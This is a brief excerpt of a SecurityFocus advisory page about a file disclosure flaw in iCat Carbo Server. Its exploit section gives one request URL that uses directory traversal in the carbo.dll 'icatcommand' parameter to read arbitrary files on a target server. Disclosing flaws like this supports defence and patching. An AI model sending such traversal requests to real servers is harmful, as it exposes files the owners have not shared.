info
discussion
exploit
solution
references
iCat Carbo Server File Disclosure Vulnerability
http://target/carbo.dll?icatcommand=..\..\directory/filename.ext&catalogname=catalog
Privacy Statement
Copyright 2010, SecurityFocus
